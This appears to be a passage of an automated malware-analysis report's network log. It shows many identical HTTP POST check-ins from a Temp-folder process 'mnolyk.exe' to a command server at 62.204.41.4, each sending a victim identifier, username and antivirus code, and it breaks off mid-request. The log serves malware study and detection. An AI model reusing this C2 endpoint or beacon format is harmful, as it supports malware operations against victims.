                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      668192.168.2.75036362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:00.334134102 CET783OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.398782969 CET783INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      669192.168.2.75036462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:00.578597069 CET784OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.642594099 CET784INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      67192.168.2.74976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:17.827369928 CET182OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.891773939 CET182INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      670192.168.2.75036562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:00.817410946 CET785OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.882772923 CET785INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      671192.168.2.75036662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:01.065649986 CET786OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.131680012 CET786INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      672192.168.2.75036762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:01.324979067 CET787OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.387620926 CET787INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      673192.168.2.75036862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:01.561611891 CET788OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.627235889 CET788INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      674192.168.2.75036962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:01.812382936 CET789OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.877387047 CET789INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      675192.168.2.75037062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:02.050257921 CET790OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.116446972 CET790INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      676192.168.2.75037162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:02.294847965 CET791OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.357384920 CET791INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      677192.168.2.75037262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:02.525801897 CET792OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.587749004 CET792INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      678192.168.2.75037362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:02.763122082 CET793OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.828680038 CET793INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      679192.168.2.75037462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:02.999700069 CET794OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.064282894 CET794INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      68192.168.2.74976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:18.271872044 CET183OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:18.334903955 CET183INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      680192.168.2.75037562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:03.233760118 CET795OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.297410011 CET795INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      681192.168.2.75037662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:03.465876102 CET796OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.528662920 CET796INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      682192.168.2.75037762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:03.701998949 CET797OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.765979052 CET797INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      683192.168.2.75037862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:03.940155983 CET798OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.004148006 CET798INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      684192.168.2.75037962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:04.185148001 CET799OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.248972893 CET799INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      685192.168.2.75038062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:04.421525002 CET800OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
